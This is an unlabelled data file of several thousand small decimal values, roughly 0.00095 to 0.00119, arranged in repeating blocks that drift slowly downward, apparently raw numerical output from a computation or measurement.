0.00117191
0.00117573
0.00117551
0.0011717
0.00117551
0.00117169
0.0011719
0.00116677
0.001163
0.00116701
0.0011629
0.0011631
0.00116686
0.00116698
0.00117188
0.00117576
0.00117564
0.00117164
0.00117555
0.00117178
0.00117168
0.00116674
0.00116696
0.00116292
0.00116313
0.00116313
0.00116696
0.00116674
0.00117191
0.00117551
0.00117574
0.0011717
0.00117551
0.0011719
0.00117169
0.00116677
0.001163
0.00116702
0.0011629
0.00116698
0.00116687
0.00116309
0.00117188
0.00117575
0.00117564
0.00117164
0.00117555
0.00117167
0.00117178
0.00116674
0.00116696
0.00116313
0.00116292
0.00116674
0.00116697
0.00116313
0.00118447
0.00118406
0.00118067
0.00118067
0.00118431
0.00118431
0.00118052
0.00117174
0.00117214
0.00117553
0.00117553
0.0011719
0.00117569
0.0011719
0.00118429
0.00118451
0.00118068
0.00118047
0.0011843
0.00118452
0.00118068
0.00118943
0.00119319
0.00119331
0.00118919
0.00118933
0.0011931
0.00118923
0.00118947
0.00118925
0.00119307
0.00119329
0.00118946
0.00119307
0.00118925
0.00118432
0.00118045
0.00118457
0.00118056
0.00118442
0.00118453
0.00118065
0.00117191
0.00117551
0.00117574
0.0011717
0.00117551
0.0011719
0.0011717
0.00116678
0.00116301
0.00116702
0.00116291
0.0011631
0.00116687
0.00116699
0.00117188
0.00117577
0.00117564
0.00117165
0.00117555
0.00117179
0.00117169
0.00116674
0.00116697
0.00116313
0.00116293
0.00116313
0.00116675
0.00116698
0.00117191
0.00117551
0.00117574
0.0011717
0.00117551
0.0011719
0.0011717
0.00116677
0.00116301
0.00116702
0.0011629
0.00116699
0.00116687
0.0011631
0.00117188
0.00117576
0.00117564
0.00117164
0.00117555
0.00117168
0.00117178
0.00116674
0.00116697
0.00116313
0.00116293
0.00116675
0.00116697
0.00116313
0.00117174
0.00117214
0.00117553
0.00117553
0.00117569
0.0011719
0.00117189
0.00114936
0.00114895
0.00114556
0.00114556
0.0011454
0.0011492
0.00114921
0.00113663
0.00113703
0.00114042
0.00114042
0.00114058
0.00113679
0.00113679
0.00114919
0.00114941
0.00114536
0.00114557
0.00114941
0.00114919
0.00114557
0.00115432
0.00115808
0.0011582
0.00115408
0.00115412
0.001158
0.00115422
0.00115436
0.00115415
0.00115818
0.00115796
0.00115414
0.00115796
0.00115436
0.00114922
0.00114534
0.00114946
0.00114545
0.00114943
0.00114931
0.00114554
0.00114918
0.0011494
0.00114536
0.00114557
0.00114941
0.00114919
0.00114557
0.00115432
0.00115808
0.0011582
0.00115409
0.00115799
0.00115412
0.00115422
0.00115436
0.00115415
0.00115818
0.00115796
0.00115796
0.00115414
0.00115435
0.00114921
0.00114534
0.00114946
0.00114545
0.00114943
0.00114554
0.00114931
0.0011368
0.00114063
0.0011404
0.00113658
0.0011404
0.00113658
0.00113679
0.00113166
0.00112789
0.0011319
0.00112779
0.00113176
0.00113187
0.00112798
0.00113676
0.00114065
0.00114053
0.00113653
0.00113667
0.00114044
0.00113656
0.00113163
0.00113185
0.00112781
0.00112802
0.00113185
0.00113164
0.00112802
0.0011368
0.00114062
0.0011404
0.00113659
0.0011404
0.00113658
0.00113679
0.00113166
0.00112789
0.0011319
0.00112779
0.00113187
0.00113175
0.00112799
0.00113677
0.00114064
0.00114053
0.00113653
0.00114044
0.00113656
0.00113667
0.00113163
0.00113185
0.0011278
0.00112802
0.00113185
0.00113164
0.00112802
0.00114936
0.00114895
0.00114556
0.00114556
0.0011492
0.0011492
0.0011454
0.00113663
0.00113703
0.00114042
0.00114042
0.00113678
0.00114058
0.00113678
0.00114918
0.00114941
0.00114536
0.00114557
0.00114941
0.00114919
0.00114557
0.00115432
0.00115808
0.0011582
0.00115409
0.00115412
0.00115799
0.00115423
0.00115436
0.00115415
0.00115818
0.00115796
0.00115414
0.00115796
0.00115435
0.00114922
0.00114534
0.00114946
0.00114545
0.00114943
0.00114931
0.00114554
0.00114919
0.00114941
0.00114557
0.00114537
0.00114919
0.00114942
0.00114557
0.00115433
0.00115809
0.0011582
0.00115409
0.001158
0.00115412
0.00115423
0.00115436
0.00115415
0.00115796
0.00115819
0.00115796
0.00115435
0.00115415
0.00114922
0.00114535
0.00114946
0.00114545
0.00114943
0.00114554
0.00114931
0.0011368
0.00114063
0.0011404
0.00113659
0.0011404
0.00113658
0.00113679
0.00113166
0.00112789
0.0011319
0.00112779
0.00113175
0.00113187
0.00112799
0.00113677
0.00114064
0.00114052
0.00113653
0.00113667
0.00114044
0.00113657
0.00113162
0.00113185
0.00112781
0.00112802
0.00113186
0.00113163
0.00112802
0.0011368
0.0011404
0.00114063
0.00113659
0.0011404
0.00113679
0.00113659
0.00113166
0.00112789
0.0011319
0.00112779
0.00113188
0.00113175
0.00112798
0.00113677
0.00114065
0.00114053
0.00113653
0.00114044
0.00113657
0.00113668
0.00113162
0.00113185
0.00112801
0.00112781
0.00113163
0.00113186
0.00112801
0.00114918
0.0011494
0.00114557
0.00114536
0.00114919
0.00114941
0.00114557
0.00115432
0.00115808
0.0011582
0.00115408
0.00115422
0.00115799
0.00115412
0.00115436
0.00115415
0.00115796
0.00115818
0.00115435
0.00115796
0.00115414
0.00114921
0.00114534
0.00114946
0.00114545
0.00114931
0.00114942
0.00114554
0.0011368
0.00114062
0.0011404
0.00113658
0.0011404
0.00113658
0.00113679
0.00113166
0.00112789
0.0011319
0.00112779
0.00112799
0.00113175
0.00113187
0.00113677
0.00114064
0.00114052
0.00113653
0.00114044
0.00113667
0.00113656
0.00113163
0.00113185
0.00112781
0.00112802
0.00112802
0.00113185
0.00113163
0.0011368
0.0011404
0.00114063
0.00113659
0.00114041
0.00113679
0.00113658
0.00113166
0.00112789
0.0011319
0.00112779
0.00113187
0.00113176
0.00112799
0.00113677
0.00114064
0.00114053
0.00113653
0.00114044
0.00113657
0.00113667
0.00113163
0.00113185
0.00112802
0.00112781
0.00113163
0.00113186
0.00112802
0.00114936
0.00114895
0.00114557
0.00114557
0.00114921
0.00114921
0.00114541
0.00113664
0.00113703
0.00114042
0.00114042
0.00113679
0.00114059
0.00113679
0.00114919
0.00114941
0.00114557
0.00114537
0.00114919
0.00114942
0.00114557
0.00115433
0.00115809
0.00115821
0.00115409
0.00115423
0.001158
0.00115413
0.00115436
0.00115415
0.00115796
0.00115819
0.00115435
0.00115796
0.00115415
0.00114922
0.00114535
0.00114946
0.00114545
0.00114931
0.00114944
0.00114554
0.0011368
0.00114041
0.00114063
0.00113659
0.00114041
0.00113679
0.00113659
0.00113166
0.00112789
0.00113191
0.00112779
0.00112799
0.00113175
0.00113188
0.00113677
0.00114065
0.00114053
0.00113653
0.00114044
0.00113667
0.00113657
0.00113163
0.00113185
0.00112802
0.00112781
0.00112802
0.00113163
0.00113186
0.0011368
0.00114041
0.00114063
0.00113659
0.00114041
0.00113679
0.00113658
0.00113166
0.00112789
0.0011319
0.00112779
0.00113187
0.00113176
0.00112799
0.00113677
0.00114065
0.00114053
0.00113653
0.00114044
0.00113657
0.00113667
0.00113163
0.00113185
0.00112802
0.00112781
0.00113164
0.00113185
0.00112802
0.00113663
0.00113703
0.00114042
0.00114042
0.00114058
0.00113678
0.00113678
0.00111425
0.00111384
0.00111045
0.00111045
0.00111029
0.00111409
0.00111409
0.00110152
0.00110191
0.0011053
0.00110531
0.00110547
0.00110167
0.00110167
0.00111407
0.00111429
0.00111025
0.00111045
0.0011143
0.00111407
0.00111046
0.00111921
0.00112297
0.00112309
0.00111897
0.00111901
0.00112288
0.00111911
0.00111924
0.00111903
0.00112307
0.00112285
0.00111903
0.00112285
0.00111924
0.0011141
0.00111023
0.00111435
0.00111033
0.00111431
0.0011142
0.00111042
0.00111407
0.00111429
0.00111025
0.00111045
0.0011143
0.00111408
0.00111046
0.00111921
0.00112297
0.00112309
0.00111897
0.00112288
0.00111901
0.00111911
0.00111925
0.00111904
0.00112307
0.00112285
0.00112285
0.00111903
0.00111924
0.0011141
0.00111024
0.00111435
0.00111034
0.00111432
0.00111043
0.0011142
0.00110168
0.00110551
0.00110528
0.00110147
0.00110529
0.00110147
0.00110167
0.00109655
0.00109277
0.00109679
0.00109267
0.00109664
0.00109675
0.00109287
0.00110165
0.00110553
0.00110541
0.00110142
0.00110156
0.00110532
0.00110145
0.00109651
0.00109673
0.00109269
0.0010929
0.00109674
0.00109652
0.0010929
0.00110168
0.00110551
0.00110528
0.00110147
0.00110529
0.00110147
0.00110168
0.00109654
0.00109278
0.00109679
0.00109267
0.00109676
0.00109664
0.00109287
0.00110165
0.00110554
0.00110542
0.00110142
0.00110533
0.00110146
0.00110156
0.00109651
0.00109673
0.00109269
0.0010929
0.00109674
0.00109652
0.0010929
0.00111425
0.00111384
0.00111046
0.00111045
0.00111409
0.0011141
0.00111029
0.00110152
0.00110191
0.00110531
0.00110531
0.00110168
0.00110547
0.00110168
0.00111407
0.00111429
0.00111025
0.00111046
0.00111429
0.00111408
0.00111046
0.00111921
0.00112297
0.00112309
0.00111897
0.00111901
0.00112288
0.00111911
0.00111924
0.00111903
0.00112307
0.00112285
0.00111903
0.00112285
0.00111924
0.0011141
0.00111023
0.00111434
0.00111033
0.00111431
0.00111419
0.00111043
0.00111407
0.00111429
0.00111046
0.00111025
0.00111407
0.00111429
0.00111046
0.00111921
0.00112297
0.00112309
0.00111897
0.00112288
0.00111901
0.00111911
0.00111924
0.00111903
0.00112284
0.00112307
0.00112284
0.00111924
0.00111903
0.0011141
0.00111023
0.00111434
0.00111033
0.00111431
0.00111042
0.00111419
0.00110168
0.00110551
0.00110529
0.00110147
0.00110529
0.00110147
0.00110168
0.00109654
0.00109278
0.00109679
0.00109267
0.00109664
0.00109676
0.00109287
0.00110165
0.00110553
0.00110541
0.00110142
0.00110156
0.00110532
0.00110145
0.00109651
0.00109673
0.00109269
0.0010929
0.00109674
0.00109652
0.0010929
0.00110169
0.00110529
0.00110551
0.00110148
0.00110529
0.00110168
0.00110147
0.00109654
0.00109277
0.00109678
0.00109267
0.00109675
0.00109664
0.00109287
0.00110165
0.00110553
0.00110541
0.00110141
0.00110532
0.00110145
0.00110156
0.00109651
0.00109674
0.0010929
0.00109269
0.00109652
0.00109674
0.0010929
0.00111407
0.00111429
0.00111046
0.00111025
0.00111408
0.0011143
0.00111046
0.00111921
0.00112297
0.00112309
0.00111897
0.00111911
0.00112288
0.00111901
0.00111925
0.00111903
0.00112285
0.00112307
0.00111924
0.00112285
0.00111903
0.0011141
0.00111023
0.00111434
0.00111033
0.0011142
0.00111431
0.00111043
0.00110169
0.00110551
0.00110528
0.00110147
0.00110529
0.00110147
0.00110168
0.00109654
0.00109278
0.00109679
0.00109267
0.00109287
0.00109664
0.00109676
0.00110165
0.00110553
0.00110541
0.00110142
0.00110532
0.00110156
0.00110145
0.00109651
0.00109673
0.00109269
0.00109291
0.0010929
0.00109674
0.00109652
0.00110168
0.00110529
0.00110551
0.00110147
0.00110529
0.00110168
0.00110147
0.00109654
0.00109278
0.00109679
0.00109267
0.00109675
0.00109664
0.00109287
0.00110165
0.00110553
0.00110541
0.00110142
0.00110532
0.00110145
0.00110156
0.00109651
0.00109673
0.0010929
0.00109269
0.00109652
0.00109674
0.0010929
0.00111424
0.00111384
0.00111045
0.00111045
0.00111409
0.00111409
0.00111029
0.00110152
0.00110191
0.00110531
0.00110531
0.00110167
0.00110547
0.00110167
0.00111407
0.00111429
0.00111045
0.00111024
0.00111408
0.00111429
0.00111046
0.00111921
0.00112297
0.00112309
0.00111897
0.00111911
0.00112288
0.00111901
0.00111924
0.00111903
0.00112285
0.00112307
0.00111924
0.00112285
0.00111903
0.0011141
0.00111023
0.00111435
0.00111033
0.00111419
0.00111431
0.00111042
0.00110168
0.00110528
0.00110551
0.00110147
0.00110529
0.00110167
0.00110146
0.00109654
0.00109278
0.00109678
0.00109267
0.00109287
0.00109664
0.00109675
0.00110165
0.00110553
0.00110541
0.00110141
0.00110532
0.00110155
0.00110144
0.00109651
0.00109673
0.0010929
0.00109269
0.0010929
0.00109651
0.00109673
0.00110168
0.00110528
0.00110551
0.00110147
0.00110528
0.00110167
0.00110147
0.00109654
0.00109277
0.00109679
0.00109267
0.00109676
0.00109664
0.00109287
0.00110165
0.00110553
0.00110541
0.00110142
0.00110532
0.00110145
0.00110156
0.00109651
0.00109673
0.0010929
0.00109269
0.00109651
0.00109674
0.0010929
0.00110151
0.00110191
0.00110531
0.00110531
0.00110547
0.00110167
0.00110167
0.00107913
0.00107872
0.00107534
0.00107534
0.00107517
0.00107897
0.00107897
0.0010664
0.0010668
0.00107019
0.00107019
0.00107035
0.00106656
0.00106656
0.00107895
0.00107918
0.00107513
0.00107534
0.00107918
0.00107896
0.00107534
0.00108409
0.00108786
0.00108798
0.00108386
0.00108389
0.00108777
0.00108399
0.00108413
0.00108392
0.00108796
0.00108773
0.00108391
0.00108773
0.00108412
0.00107899
0.00107511
0.00107923
0.00107522
0.0010792
0.00107908
0.00107531
0.00107896
0.00107918
0.00107513
0.00107534
0.00107918
0.00107896
0.00107534
0.0010841
0.00108786
0.00108798
0.00108386
0.00108777
0.00108389
0.001084
0.00108413
0.00108392
0.00108795
0.00108773
0.00108773
0.00108391
0.00108412
0.00107899
0.00107511
0.00107923
0.00107522
0.0010792
0.00107531
0.00107908
0.00106657
0.0010704
0.00107017
0.00106636
0.00107017
0.00106635
0.00106656
0.00106143
0.00105766
0.00106167
0.00105756
0.00106153
0.00106164
0.00105775
0.00106654
0.00107042
0.0010703
0.0010663
0.00106644
0.00107021
0.00106634
0.00106139
0.00106162
0.00105758
0.00105779
0.00106162
0.0010614
0.00105779
0.00106657
0.0010704
0.00107017
0.00106636
0.00107017
0.00106636
0.00106656
0.00106143
0.00105766
0.00106167
0.00105756
0.00106164
0.00106152
0.00105775
0.00106654
0.00107042
0.0010703
0.0010663
0.00107021
0.00106634
0.00106644
0.0010614
0.00106162
0.00105758
0.00105779
0.00106162
0.0010614
0.00105779
0.00107913
0.00107872
0.00107534
0.00107533
0.00107898
0.00107898
0.00107518
0.0010664
0.0010668
0.00107019
0.00107019
0.00106656
0.00107035
0.00106656
0.00107896
0.00107917
0.00107513
0.00107534
0.00107918
0.00107896
0.00107534
0.00108409
0.00108785
0.00108797
0.00108386
0.00108389
0.00108776
0.00108399
0.00108413
0.00108392
0.00108795
0.00108773
0.00108391
0.00108773
0.00108412
0.00107899
0.00107511
0.00107923
0.00107522
0.0010792
0.00107908
0.00107531
0.00107895
0.00107917
0.00107534
0.00107513
0.00107896
0.00107917
0.00107534
0.00108409
0.00108785
0.00108797
0.00108385
0.00108776
0.00108389
0.00108399
0.00108413
0.00108392
0.00108773
0.00108795
0.00108773
0.00108412
0.00108391
0.00107898
0.00107511
0.00107922
0.00107522
0.00107919
0.00107531
0.00107908
0.00106657
0.00107039
0.00107017
0.00106635
0.00107017
0.00106635
0.00106656
0.00106143
0.00105766
0.00106167
0.00105755
0.00106152
0.00106164
0.00105775
0.00106654
0.00107041
0.0010703
0.0010663
0.00106644
0.00107021
0.00106633
0.00106139
0.00106161
0.00105757
0.00105778
0.00106162
0.0010614
0.00105778
0.00106657
0.00107017
0.00107039
0.00106635
0.00107017
0.00106655
0.00106635
0.00106142
0.00105766
0.00106167
0.00105755
0.00106163
0.00106152
0.00105775
0.00106653
0.00107041
0.00107029
0.0010663
0.00107021
0.00106633
0.00106644
0.00106139
0.00106161
0.00105778
0.00105757
0.0010614
0.00106162
0.00105778
0.00107895
0.00107917
0.00107534
0.00107513
0.00107895
0.00107918
0.00107534
0.00108409
0.00108785
0.00108797
0.00108385
0.00108399
0.00108776
0.00108389
0.00108413
0.00108392
0.00108773
0.00108795
0.00108412
0.00108773
0.00108391
0.00107898
0.00107511
0.00107923
0.00107521
0.00107908
0.0010792
0.00107531
0.00106657
0.00107039
0.00107017
0.00106636
0.00107017
0.00106635
0.00106656
0.00106143
0.00105766
0.00106167
0.00105756
0.00105775
0.00106152
0.00106164
0.00106654
0.00107041
0.0010703
0.0010663
0.00107021
0.00106644
0.00106633
0.00106139
0.00106162
0.00105758
0.00105779
0.00105779
0.00106162
0.0010614
0.00106657
0.00107017
0.00107039
0.00106635
0.00107017
0.00106656
0.00106635
0.00106143
0.00105766
0.00106167
0.00105755
0.00106164
0.00106152
0.00105775
0.00106653
0.00107041
0.00107029
0.0010663
0.0010702
0.00106633
0.00106644
0.00106139
0.00106162
0.00105778
0.00105757
0.0010614
0.00106162
0.00105778
0.00107913
0.00107872
0.00107533
0.00107533
0.00107897
0.00107897
0.00107517
0.0010664
0.00106679
0.00107019
0.00107019
0.00106655
0.00107035
0.00106655
0.00107895
0.00107917
0.00107534
0.00107513
0.00107896
0.00107918
0.00107534
0.00108409
0.00108785
0.00108797
0.00108385
0.00108399
0.00108776
0.00108389
0.00108412
0.00108391
0.00108773
0.00108795
0.00108412
0.00108773
0.00108391
0.00107898
0.00107511
0.00107923
0.00107522
0.00107908
0.0010792
0.00107531
0.00106656
0.00107016
0.00107039
0.00106635
0.00107017
0.00106655
0.00106635
0.00106143
0.00105766
0.00106167
0.00105755
0.00105775
0.00106152
0.00106164
0.00106653
0.00107041
0.00107029
0.0010663
0.0010702
0.00106644
0.00106633
0.00106139
0.00106161
0.00105778
0.00105758
0.00105779
0.0010614
0.00106162
0.00106656
0.00107017
0.00107039
0.00106635
0.00107017
0.00106655
0.00106635
0.00106142
0.00105766
0.00106167
0.00105755
0.00106163
0.00106152
0.00105775
0.00106653
0.00107041
0.00107029
0.0010663
0.0010702
0.00106633
0.00106644
0.00106139
0.00106161
0.00105778
0.00105757
0.0010614
0.00106162
0.00105778
0.0010664
0.00106679
0.00107019
0.00107019
0.00107035
0.00106655
0.00106655
0.00104401
0.00104361
0.00104022
0.00104022
0.00104006
0.00104386
0.00104386
0.00103128
0.00103168
0.00103508
0.00103508
0.00103524
0.00103144
0.00103144
0.00104384
0.00104406
0.00104002
0.00104023
0.00104407
0.00104385
0.00104023
0.00104898
0.00105274
0.00105286
0.00104874
0.00104878
0.00105265
0.00104888
0.00104902
0.00104881
0.00105284
0.00105262
0.0010488
0.00105262
0.00104901
0.00104387
0.00104
0.00104411
0.0010401
0.00104408
0.00104397
0.00104019
0.00104384
0.00104406
0.00104002
0.00104023
0.00104407
0.00104384
0.00104023
0.00104898
0.00105274
0.00105286
0.00104874
0.00105265
0.00104878
0.00104888
0.00104901
0.00104881
0.00105284
0.00105261
0.00105262
0.0010488
0.00104901
0.00104387
0.00104
0.00104411
0.0010401
0.00104408
0.0010402
0.00104396
0.00103145
0.00103528
0.00103506
0.00103125
0.00103506
0.00103124
0.00103145
0.00102631
0.00102254
0.00102656
0.00102244
0.00102641
0.00102653
0.00102264
0.00103142
0.0010353
0.00103518
0.00103119
0.00103132
0.00103509
0.00103122
0.00102628
0.00102651
0.00102246
0.00102267
0.00102651
0.00102628
0.00102267
0.00103146
0.00103529
0.00103506
0.00103125
0.00103506
0.00103124
0.00103145
0.00102631
0.00102254
0.00102656
0.00102244
0.00102653
0.00102641
0.00102263
0.00103143
0.0010353
0.00103518
0.00103119
0.0010351
0.00103122
0.00103133
0.00102628
0.00102651
0.00102246
0.00102267
0.00102651
0.00102629
0.00102267
0.00104401
0.00104361
0.00104022
0.00104022
0.00104386
0.00104386
0.00104006
0.00103128
0.00103168
0.00103507
0.00103508
0.00103144
0.00103523
0.00103144
0.00104383
0.00104406
0.00104001
0.00104022
0.00104406
0.00104384
0.00104022
0.00104898
0.00105274
0.00105285
0.00104874
0.00104878
0.00105265
0.00104888
0.00104901
0.0010488
0.00105283
0.00105261
0.00104879
0.00105261
0.001049
0.00104387
0.00103999
0.00104411
0.0010401
0.00104408
0.00104396
0.00104019
0.00104384
0.00104406
0.00104021
0.00104002
0.00104384
0.00104407
0.00104022
0.00104898
0.00105273
0.00105285
0.00104874
0.00105264
0.00104877
0.00104888
0.00104901
0.0010488
0.00105261
0.00105283
0.00105261
0.001049
0.0010488
0.00104387
0.00104
0.00104411
0.0010401
0.00104408
0.00104019
0.00104396
0.00103145
0.00103528
0.00103504
0.00103124
0.00103505
0.00103123
0.00103143
0.00102631
0.00102254
0.00102655
0.00102243
0.0010264
0.00102652
0.00102263
0.00103142
0.0010353
0.00103518
0.00103118
0.00103132
0.00103509
0.00103121
0.00102627
0.0010265
0.00102245
0.00102266
0.0010265
0.00102628
0.00102266
0.00103144
0.00103504
0.00103528
0.00103124
0.00103505
0.00103144
0.00103123
0.00102631
0.00102254
0.00102655
0.00102243
0.00102652
0.0010264
0.00102263
0.00103142
0.0010353
0.00103518
0.00103118
0.00103509
0.00103122
0.00103132
0.00102627
0.0010265
0.00102266
0.00102245
0.00102628
0.0010265
0.00102266
0.00104384
0.00104405
0.00104022
0.00104001
0.00104384
0.00104406
0.00104022
0.00104897
0.00105273
0.00105285
0.00104873
0.00104887
0.00105264
0.00104877
0.00104901
0.0010488
0.00105261
0.00105283
0.001049
0.00105262
0.00104879
0.00104386
0.00103999
0.00104411
0.0010401
0.00104396
0.00104407
0.00104019
0.00103145
0.00103528
0.00103505
0.00103123
0.00103505
0.00103123
0.00103144
0.00102631
0.00102254
0.00102655
0.00102244
0.00102264
0.0010264
0.00102652
0.00103142
0.0010353
0.00103518
0.00103118
0.00103509
0.00103132
0.00103122
0.00102627
0.0010265
0.00102246
0.00102267
0.00102267
0.0010265
0.00102628
0.00103145
0.00103505
0.00103527
0.00103123
0.00103505
0.00103144
0.00103123
0.00102631
0.00102254
0.00102655
0.00102243
0.00102652
0.0010264
0.00102263
0.00103141
0.00103529
0.00103517
0.00103118
0.00103509
0.00103121
0.00103132
0.00102627
0.0010265
0.00102266
0.00102245
0.00102628
0.0010265
0.00102266
0.00104401
0.0010436
0.00104021
0.00104021
0.00104385
0.00104385
0.00104005
0.00103128
0.00103167
0.00103507
0.00103507
0.00103143
0.00103523
0.00103143
0.00104383
0.00104405
0.00104022
0.00104001
0.00104384
0.00104406
0.00104022
0.00104897
0.00105274
0.00105285
0.00104874
0.00104888
0.00105264
0.00104877
0.00104901
0.0010488
0.00105261
0.00105283
0.001049
0.00105261
0.00104879
0.00104386
0.00103999
0.00104411
0.0010401
0.00104396
0.00104407
0.00104019
0.00103144
0.00103505
0.00103527
0.00103123
0.00103505
0.00103144
0.00103123
0.0010263
0.00102254
0.00102655
0.00102243
0.00102263
0.0010264
0.00102652
0.00103142
0.00103529
0.00103517
0.00103118
0.00103509
0.00103132
0.00103121
0.00102627
0.00102649
0.00102267
0.00102245
0.00102267
0.00102628
0.0010265
0.00103145
0.00103505
0.00103527
0.00103123
0.00103505
0.00103144
0.00103123
0.00102631
0.00102254
0.00102655
0.00102243
0.00102652
0.0010264
0.00102263
0.00103142
0.00103529
0.00103518
0.00103118
0.00103509
0.00103121
0.00103132
0.00102627
0.0010265
0.00102267
0.00102245
0.00102628
0.0010265
0.00102266
0.00103128
0.00103167
0.00103507
0.00103507
0.00103523
0.00103143
0.00103143
0.00100889
0.00100848
0.0010051
0.0010051
0.00100494
0.00100874
0.00100874
0.000996159
0.000996554
0.000999954
0.000999953
0.00100011
0.000996315
0.000996315
0.00100872
0.00100894
0.0010049
0.0010051
0.00100895
0.00100872
0.00100511
0.00101386
0.00101762
0.00101774
0.00101362
0.00101366
0.00101753
0.00101376
0.00101389
0.00101369
0.00101772
0.0010175
0.00101368
0.0010175
0.00101389
0.00100875
0.00100488
0.00100899
0.00100498
0.00100896
0.00100884
0.00100507
0.00100871
0.00100894
0.00100489
0.0010051
0.00100894
0.00100872
0.0010051
0.00101386
0.00101762
0.00101774
0.00101362
0.00101753
0.00101366
0.00101376
0.00101389
0.00101368
0.00101772
0.0010175
0.0010175
0.00101368
0.00101389
0.00100875
0.00100487
0.00100899
0.00100498
0.00100896
0.00100507
0.00100884
0.000996323
0.00100016
0.000999929
0.000996118
0.000999932
0.00099611
0.000996316
0.000991187
0.000987415
0.00099143
0.000987313
0.000991281
0.0009914
0.000987508
0.000996296
0.00100018
0.00100006
0.00099606
0.0009962
0.000999968
0.000996097
0.000991148
0.000991375
0.00098733
0.000987542
0.000991377
0.000991158
0.000987538
0.000996326
0.00100015
0.00099993
0.000996115
0.00099993
0.00099611
0.000996316
0.000991185
0.000987415
0.000991428
0.000987309
0.000991396
0.000991277
0.000987507
0.000996295
0.00100017
0.00100005
0.000996058
0.000999966
0.000996093
0.000996197
0.00099115
0.000991374
0.000987328
0.000987544
0.000991376
0.000991158
0.000987539
0.00100889
0.00100848
0.00100509
0.00100509
0.00100873
0.00100874
0.00100493
0.000996159
0.000996555
0.000999949
0.000999951
0.000996313
0.00100011
0.000996315
0.00100871
0.00100893
0.00100489
0.00100509
0.00100894
0.00100872
0.0010051
0.00101386
0.00101762
0.00101773
0.00101362
0.00101365
0.00101753
0.00101376
0.00101389
0.00101368
0.00101771
0.00101749
0.00101367
0.00101749
0.00101388
0.00100875
0.00100487
0.00100899
0.00100498
0.00100896
0.00100884
0.00100507
0.00100871
0.00100893
0.00100509
0.00100488
0.00100872
0.00100894
0.0010051
0.00101385
0.00101761
0.00101773
0.00101361
0.00101752
0.00101365
0.00101375
0.00101389
0.00101368
0.00101749
0.00101771
0.00101749
0.00101388
0.00101367
0.00100874
0.00100487
0.00100898
0.00100497
0.00100895
0.00100506
0.00100884
0.000996324
0.00100015
0.000999925
0.000996112
0.000999928
0.000996107
0.000996317
0.000991185
0.000987416
0.000991427
0.000987311
0.000991279
0.000991395
0.000987511
0.000996295
0.00100017
0.00100005
0.000996056
0.000996198
0.000999965
0.000996092
0.000991151
0.000991373
0.000987332
0.000987543
0.000991376
0.000991159
0.000987544
0.000996322
0.000999926
0.00100015
0.000996111
0.000999925
0.000996317
0.000996104
0.000991182
0.000987412
0.000991424
0.000987306
0.000991392
0.000991276
0.000987505
0.000996291
0.00100017
0.00100005
0.000996054
0.000999961
0.000996088
0.000996195
0.000991148
0.000991372
0.000987545
0.000987326
0.000991159
0.000991373
0.000987539
0.00100871
0.00100893
0.0010051
0.00100489
0.00100872
0.00100894
0.0010051
0.00101385
0.00101762
0.00101774
0.00101362
0.00101375
0.00101752
0.00101365
0.00101389
0.00101368
0.00101749
0.00101771
0.00101389
0.00101749
0.00101367
0.00100874
0.00100487
0.00100899
0.00100497
0.00100884
0.00100896
0.00100507
0.000996327
0.00100015
0.000999931
0.000996111
0.000999934
0.000996108
0.000996317
0.000991185
0.000987416
0.000991428
0.000987312
0.000987511
0.00099128
0.000991395
0.000996295
0.00100017
0.00100006
0.000996057
0.000999967
0.000996199
0.000996091
0.000991152
0.000991375
0.000987331
0.000987546
0.000987544
0.000991378
0.000991159
0.000996326
0.000999932
0.00100015
0.000996113
0.000999932
0.000996318
0.00099611
0.000991186
0.000987415
0.000991428
0.000987314
0.000991399
0.00099128
0.000987507
0.000996296
0.00100017
0.00100005
0.000996056
0.000999965
0.000996093
0.000996197
0.00099115
0.000991374
0.000987539
0.000987333
0.000991157
0.000991382
0.000987538
0.00100889
0.00100848
0.00100509
0.00100509
0.00100873
0.00100873
0.00100493
0.000996157
0.000996551
0.000999946
0.000999946
0.000996313
0.00100011
0.00099631
0.00100871
0.00100893
0.00100509
0.00100489
0.00100871
0.00100894
0.0010051
0.00101385
0.00101761
0.00101773
0.00101361
0.00101375
0.00101752
0.00101365
0.00101389
0.00101368
0.00101749
0.00101771
0.00101388
0.00101749
0.00101367
0.00100874
0.00100487
0.00100898
0.00100497
0.00100883
0.00100895
0.00100506
0.000996322
0.000999925
0.00100015
0.000996109
0.000999929
0.000996314
0.000996105
0.000991182
0.000987417
0.000991427
0.000987315
0.00098751
0.000991278
0.000991395
0.000996292
0.00100017
0.00100005
0.000996054
0.000999964
0.000996195
0.000996089
0.000991146
0.000991372
0.000987545
0.000987331
0.000987541
0.000991159
0.000991374
0.000996321
0.000999923
0.00100015
0.000996111
0.000999927
0.000996313
0.000996106
0.000991181
0.00098741
0.000991425
0.000987307
0.000991392
0.000991276
0.000987505
0.000996291
0.00100017
0.00100005
0.000996054
0.000999961
0.000996089
0.000996195
0.000991147
0.000991372
0.000987541
0.000987328
0.000991157
0.000991374
0.000987539
0.000996154
0.000996551
0.000999949
0.00099995
0.00100011
0.000996311
0.000996311
0.000973766
0.000973356
0.000969966
0.000969968
0.000969809
0.000973609
0.00097361
0.00096103
0.000961425
0.000964821
0.000964823
0.000964984
0.000961186
0.000961185
0.00097359
0.00097381
0.000969764
0.00096997
0.000973814
0.000973594
0.000969972
0.000978729
0.000982492
0.000982613
0.000978493
0.000978528
0.000982402
0.000978631
0.000978767
0.000978554
0.000982591
0.00098237
0.000978547
0.000982371
0.000978761
0.00097362
0.00096975
0.000973864
0.000969851
0.000973832
0.000973714
0.000969944
0.000973589
0.00097381
0.000969761
0.000969973
0.000973812
0.000973596
0.000969975
0.000978731
0.000982491
0.000982609
0.00097849
0.000982402
0.000978525
0.000978631
0.000978767
0.000978555
0.00098259
0.000982368
0.000982371
0.000978547
0.000978761
0.000973619
0.000969742
0.00097386
0.000969848
0.000973828
0.000969942
0.000973712
0.000961193
0.000965025
0.000964797
0.000960982
0.000964798
0.000960979
0.000961185
0.000956054
0.000952284
0.000956298
0.000952177
0.00095615
0.000956266
0.000952374
0.000961164
0.000965052
0.00096493
0.000960929
0.000961069
0.000964839
0.000960966
0.00095602
0.000956243
0.000952198
0.000952412
0.000956247
0.000956028
0.00095241
0.000961198
0.000965024
0.0009648
0.000960984
0.000964803
0.000960982
0.000961186
0.000956056
0.000952283
0.000956297
0.000952179
0.000956266
0.000956147
0.000952376
0.000961167
0.000965043
0.000964924
0.000960928
0.000964837
0.000960964
0.000961069
0.000956021
0.000956243
0.000952201
0.000952408
0.000956251
0.000956025
0.000952408
0.000973764
0.000973355
0.000969966
0.000969966
0.000973608
0.000973608
0.000969807
0.000961029
0.000961423
0.000964819
